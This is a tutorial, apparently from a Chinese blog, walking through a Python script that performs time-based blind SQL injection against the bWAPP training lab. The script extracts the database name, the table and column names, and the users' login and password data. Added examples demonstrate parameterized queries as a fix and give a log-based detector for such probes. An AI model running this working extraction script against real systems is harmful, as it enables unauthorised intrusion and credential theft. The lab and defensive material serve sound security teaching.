Complete steps for time-based blind SQL injection with a Python script


    1. Get the length of the database name

    Test environment: the bWAPP lab, exercise "SQL Injection - Blind - Time-Based".
    [screenshot]

    import requests
    import time

    # Session cookie of the logged-in bWAPP user (values captured from the browser session)
    HEADER = {
        "Cookie": "BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0"
    }
    BASE_URL = "http://127.0.0.1:9004/sqli_15.php?"

    def get_database_name_length(value1, value2):
        # value1: name of the injectable parameter ("title"); value2: rest of the query string ("&action=search")
        count = 0
        for i in range(100):
            # sleep(1) only runs when the guessed length is right, so a slow response confirms the guess
            url = BASE_URL + "{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            # print(resp.content)
            if time.time() - start_time > 1:
                print("数据库长度为:{}".format(i))
                count = i
                break
        return count

    Call:
    databaselen = get_database_name_length("title", "&action=search") + 1
    Result:
    [screenshot]
    Tip: the "title=" parameter and the trailing "&action=search" are taken from the request captured with Burp.
    Note that "--" must have a space on both sides.
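The reason the probe above works is that the application splices the "title" value into SQL text, so the single quote closes the string literal and everything after it runs as SQL. The following is an added example, not code from the original post or from bWAPP: it rebuilds that search in an in-memory SQLite database (constructed table and rows; a stand-in database() function is registered because SQLite has none) and runs the page's length predicate, without the sleep() call, through both a string-built query and a parameterized one to show that only the former leaks.

```python
import sqlite3

DB_NAME = "bWAPP"  # constructed stand-in for what MySQL's database() would return


def setup_db():
    """In-memory SQLite stand-in (constructed) for the movie search the page injects into."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no database() function; register one so the page's predicate parses unchanged.
    conn.create_function("database", 0, lambda: DB_NAME)
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO movies (title) VALUES (?)",
        [("Man of Steel",), ("Iron Man",), ("The Dark Knight",)],
    )
    return conn


def search_vulnerable(conn, title):
    """String-built query: a quote inside `title` closes the literal and the rest runs as SQL."""
    sql = "SELECT title FROM movies WHERE title = '%s'" % title
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, title):
    """Bound parameter: the driver passes `title` as data, never as SQL text."""
    sql = "SELECT title FROM movies WHERE title = ?"
    return [row[0] for row in conn.execute(sql, (title,))]


def length_oracle(search, guess):
    """Send the page's length probe (minus sleep()) through `search`; True if a row came back."""
    payload = "Man of Steel' and length(database())=%d -- " % guess
    return bool(search(setup_db(), payload))


def oracle_leaks(search):
    """Can a caller tell a correct length guess from a wrong one through `search`?"""
    return length_oracle(search, len(DB_NAME)) != length_oracle(search, len(DB_NAME) + 1)


if __name__ == "__main__":
    print("string-built query leaks:", oracle_leaks(search_vulnerable))      # True
    print("parameterized query leaks:", oracle_leaks(search_parameterized))  # False
    print("legit search still works:", search_parameterized(setup_db(), "Man of Steel"))
```

With the bound parameter the whole payload is compared as one title string, so the right and wrong guesses both return nothing and there is no timing or row-count side channel left for a sleep() to attach to.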

    2. Get the database name

    def get_database_name(length, value1, value2):
        # Recover the name one character at a time: for each position, try every ASCII code
        name = ""
        for i in range(1, length):
            for j in range(127):
                url = BASE_URL + "{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2)
                start_time = time.time()
                resp = requests.get(url, headers=HEADER)
                if time.time() - start_time > 2:
                    print("{}:{}".format(i, j), chr(j))
                    name += chr(j)
                    break
        print("数据库名称为:", name)
        return name

    Call:
    database = get_database_name(databaselen, "title", "&action=search")
    Result:
    [screenshot]

    3. Get the total length of the table names

    def get_table_name_length(database, value1, value2):
        # Length of the comma-separated list of all table names in the given schema
        count = 0
        for i in range(100):
            url = BASE_URL + "{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1)) ={} and sleep(1) -- {}".format(value1, database, i, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print("表名总长度为:{}".format(i))
                count = i
                break
        return count

    Call:
    tablelen = get_table_name_length(database, "title", "&action=search") + 1
    Result: [screenshot]

    4. Get the table names

    def get_table_name(length, database, value1, value2):
        # Same character-by-character oracle, applied to the GROUP_CONCAT of table names
        names = ""
        for i in range(1, length):
            for j in range(127):
                url = BASE_URL + "{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i, j, value2)
                start_time = time.time()
                resp = requests.get(url, headers=HEADER)
                if time.time() - start_time > 2:
                    # print("{}:{}".format(i, j), chr(j))
                    names += chr(j)
                    break
            print("{}:".format(i), names)
        print("表名为:", names)
        return names

    Call:
    get_table_name(tablelen, database, "title", "&action=search")
    Result:
    [screenshot]

    5. Get the total length of the column names of a given table

    def get_column_name_length(database, table, value1, value2):
        # Length of the comma-separated list of column names of `table` in `database`
        count = 0
        for i in range(100):
            # the trailing argument must be value2 ("&action=search"), not value1
            url = BASE_URL + "{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1)) ={} and sleep(1) -- {}".format(value1, table, database, i, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print("列名总长度为:{}".format(i))
                count = i
                break
        return count

    Call:
    columnlen = get_column_name_length(database, "users", "title", "&action=search") + 1
    Result:
    [screenshot]

    6. Get the column names of a given table

    def get_column_name(length, database, table, value1, value2):
        names = ""
        for i in range(1, length):
            for j in range(127):
                url = BASE_URL + "{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{},1))={} and sleep(2) -- {}".format(value1, table, database, i, j, value2)
                start_time = time.time()
                # no trailing comma here: it would turn resp into a one-element tuple
                resp = requests.get(url, headers=HEADER)
                if time.time() - start_time > 2:
                    names += chr(j)
                    break
            print("{}:".format(i), names)
        print("列名为:", names)
        return names

    Call:
    get_column_name(columnlen, database, "users", "title", "&action=search")
    Result:
    [screenshot]

    7. Get the total length of the data in the given columns of a given table

    def get_data_name_length(table, username, password, value1, value2):
        # Length of all rows of the two columns, concatenated as "username:password" pairs
        count = 0
        for i in range(100):
            url = BASE_URL + "{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1)) ={} and sleep(1) -- {}".format(value1, username, password, table, i, value2)
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print("列数据总长度为:{}".format(i))
                count = i
                break
        return count

    Call:
    datalen = get_data_name_length("users", "login", "password", "title", "&action=search") + 1
    Result:
    [screenshot]

    8. Get the data in the given columns of a given table

    def get_data_name(length, table, username, password, value1, value2):
        data = ""
        for i in range(1, length):
            for j in range(127):
                url = BASE_URL + "{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i, j, value2)
                start_time = time.time()
                # no trailing comma here: it would turn resp into a one-element tuple
                resp = requests.get(url, headers=HEADER)
                if time.time() - start_time > 2:
                    data += chr(j)
                    break
            print("{}:".format(i), data)
        print("登录数据为:", data)
        return data

    Call:
    get_data_name(datalen, "users", "login", "password", "title", "&action=search")
    Result:
    [screenshot]
    We found this approach noticeably faster and more efficient than Burp; the only manual part is that, from the column-name step onward, you have to pick the table name yourself.
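Every step of the procedure above leaves the same footprint on the server: a burst of near-identical requests from one client whose query string carries sleep() and an ascii(substr(...)) predicate, with one request per character position taking a full second or two longer than the rest. The following is an added example, not part of the original post: a small log analyser that parses constructed access-log lines (combined format with an assumed trailing response-time field in milliseconds, as nginx's $request_time or Apache's %D can provide), flags requests containing time-delay primitives or the byte-at-a-time oracle, and summarises probe volume and slow responses per client. The SLOW_MS threshold, the log layout and the sample IPs are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample: combined log format + response time in ms as the last field (assumed layout).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2023:10:00:01 +0000] "GET /sqli_15.php?title=Man+of+Steel&action=search HTTP/1.1" 200 5123 12
10.0.0.9 - - [01/Oct/2023:10:00:02 +0000] "GET /sqli_15.php?title=Man%20of%20Steel%27%20and%20length(database())%3D4%20and%20sleep(1)%20--%20&action=search HTTP/1.1" 200 4980 15
10.0.0.9 - - [01/Oct/2023:10:00:03 +0000] "GET /sqli_15.php?title=Man%20of%20Steel%27%20and%20length(database())%3D5%20and%20sleep(1)%20--%20&action=search HTTP/1.1" 200 4980 1016
10.0.0.9 - - [01/Oct/2023:10:00:05 +0000] "GET /sqli_15.php?title=Man%20of%20Steel%27%20and%20ascii(substr(database(),1,1))%3D97%20and%20sleep(2)%20--%20&action=search HTTP/1.1" 200 4980 14
10.0.0.9 - - [01/Oct/2023:10:00:06 +0000] "GET /sqli_15.php?title=Man%20of%20Steel%27%20and%20ascii(substr(database(),1,1))%3D98%20and%20sleep(2)%20--%20&action=search HTTP/1.1" 200 4980 2021
10.0.0.7 - - [01/Oct/2023:10:00:07 +0000] "GET /sqli_15.php?title=Iron+Man&action=search HTTP/1.1" 200 5001 9
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# Delay primitives of the common engines; the page's script uses MySQL's sleep().
TIME_PRIMITIVES = [
    ("mysql sleep()", re.compile(r"\bsleep\s*\(", re.I)),
    ("mysql benchmark()", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("postgres pg_sleep()", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("mssql waitfor delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
]
# The byte-at-a-time extraction predicate used in every step of the page's script.
CHAR_ORACLE = re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I)
SLOW_MS = 900  # assumption: just under the 1 s sleep the script triggers on a correct guess


def flag_request(target):
    """Return the reasons a request target looks like a time-based blind SQLi probe ([] if clean)."""
    query = unquote_plus(urlsplit(target).query)  # decode %27, %20, %3D, '+' before matching
    reasons = [name for name, rx in TIME_PRIMITIVES if rx.search(query)]
    if CHAR_ORACLE.search(query):
        reasons.append("byte-at-a-time oracle ascii(substr(...))")
    return reasons


def analyze(log_text):
    """Per-client summary of flagged requests: how many, how many were slow, and why."""
    report = defaultdict(lambda: {"probes": 0, "slow_probes": 0, "reasons": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed layout; skip rather than guess
        reasons = flag_request(m["target"])
        if not reasons:
            continue
        entry = report[m["client"]]
        entry["probes"] += 1
        entry["reasons"].update(reasons)
        if int(m["ms"]) >= SLOW_MS:
            entry["slow_probes"] += 1  # a slow probe means the injected condition was true
    return dict(report)


if __name__ == "__main__":
    for client, entry in analyze(SAMPLE_LOG).items():
        print(client, entry["probes"], "probes,", entry["slow_probes"], "slow:", sorted(entry["reasons"]))
```

The two signals reinforce each other: the keyword match alone would also fire on a benign title containing the word "sleep", but a client that sends dozens of such requests per minute with a strict one-slow-response-per-position pattern is the script above and nothing else, so alert on the combination rather than on either one.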

  Original post: https://blog.csdn.net/wutiangui/article/details/133430564